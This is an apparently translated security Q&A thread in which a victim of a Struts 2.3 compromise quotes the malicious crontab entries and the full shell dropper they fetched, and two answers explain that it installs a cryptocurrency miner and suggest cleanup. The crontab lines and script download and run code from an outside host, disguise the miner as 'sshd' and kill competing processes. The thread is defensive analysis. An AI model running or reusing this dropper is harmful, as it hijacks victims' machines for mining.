Struts2.3 Attacco Zero Day sfruttato: viene creato CronJob

Naviga le tue risposte
3

Qualcuno può aiutare a capire cosa si sta facendo esattamente attraverso questo attacco. Stavo usando Struts2.3 in ambiente Jboss5. Ho avuto alcuni crontab installati, che sono andati persi invece queste due righe sono state viste in crontab. 

#*/20 * * * * wget -O - -q http://91.230.47.40/icons/logo.jpg|sh
#*/19 * * * * curl http://91.230.47.40/icons/logo.jpg|sh

Di seguito è riportato lo script nel file logo.jpg che è stato scaricato da "wget" da 91.230.47.40 

#!/bin/sh
rm -rf /var/tmp/jmpmxfyhiz.conf
ps auxf|grep -v grep|grep -v xxtyligbex|grep "/tmp/"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "\./"|grep 'httpd.conf'|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "\-p x"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "jmpmxfyhiz"|awk '{print $2}'|xargs kill -9
ps -fe|grep -e "xxtyligbex" -e "tmbllmjcex" -e "pclfzagbkh" -e "dqpuewpvxz" -e "gzvcdujihq" -e "bevgesdhbs"|grep -v grep
if [ $? -ne 0 ]
then
echo "start process....."
chmod 777 /var/tmp/xxtyligbex.conf
rm -rf /var/tmp/xxtyligbex.conf
curl -o /var/tmp/xxtyligbex.conf http://91.230.47.40/icons/kworker.conf
wget -O /var/tmp/xxtyligbex.conf http://91.230.47.40/icons/kworker.conf
chmod 777 /var/tmp/sshd
rm -rf /var/tmp/sshd
cat /proc/cpuinfo|grep aes>/dev/null
if [ $? -ne 1 ]
then
curl -o /var/tmp/sshd http://91.230.47.40/icons/kworker
wget -O /var/tmp/sshd http://91.230.47.40/icons/kworker
else
curl -o /var/tmp/sshd http://91.230.47.40/icons/kworker_na
wget -O /var/tmp/sshd http://91.230.47.40/icons/kworker_na
fi
chmod +x /var/tmp/sshd
cd /var/tmp
proc='grep -c ^processor /proc/cpuinfo'
cores=$((($proc+1)/2))
num=$(($cores*3))
sysctl -w vm.nr_hugepages='$num'
nohup ./sshd -c xxtyligbex.conf -t 'echo $cores' >/dev/null &
nohup ./sshd -c xxtyligbex.conf -t 'echo $cores' >/dev/null &
else
echo "runing....."
fi

Gentilmente aiutami a capire cosa viene fatto attraverso questo. Aiutami anche a rimuovere la possibilità che eventuali malware vengano installati sul mio server. Per coprire la vulnerabilità ho spostato i miei progetti in Struts 2.5. Ancora il crontab continua a tornare anche se li rimuovo.

    
posta Anirudh shetty 27.06.2017 - 06:53
fonte

2 risposte

6

Le azioni descritte installano uno strumento "kworker" sul tuo server, che sembra essere un bitcoin miner, secondo a Virustotal.

Poiché i record appaiono in / etc / crontab file, molto probabilmente hai installato un pacchetto con tojan sul tuo sistema.

Per risolvere questo problema, ti consiglio di reinstallare il sistema operativo sul tuo server, poiché la scatola è già di proprietà degli autori di attacchi e potrebbero aver installato anche altri malware.

    
risposta data 27.06.2017 - 11:59
fonte
1

Recentemente ho visto un attacco simile. Ecco cosa fare:

Trova il web-shell ... è probabilmente uno di quelli: link quindi un comando come "trova / -iname" wso.php "-tipo f" dovrebbe aiutarti a trovarlo. Inoltre dovrebbe esserci un index.html e un up-loader chiamato "ajis.phtml" o simile in quella directory. Rimuovi quei file. Rimuovi i file in "/ var / tmp" dove si trova il file sshd dannoso e la configurazione del pool di mining. Aggiorna Struts, riavvia e basta ...

ovviamente rimuovi i cronjobs ...

applausi

    
risposta data 27.06.2017 - 18:04
fonte

Leggi altre domande sui tag

È pericoloso per un truffatore sapere solo il tuo nome e il tuo compleanno? [chiuso] Esiste una versione di base di jQuery che non presenta una vulnerabilità XSS?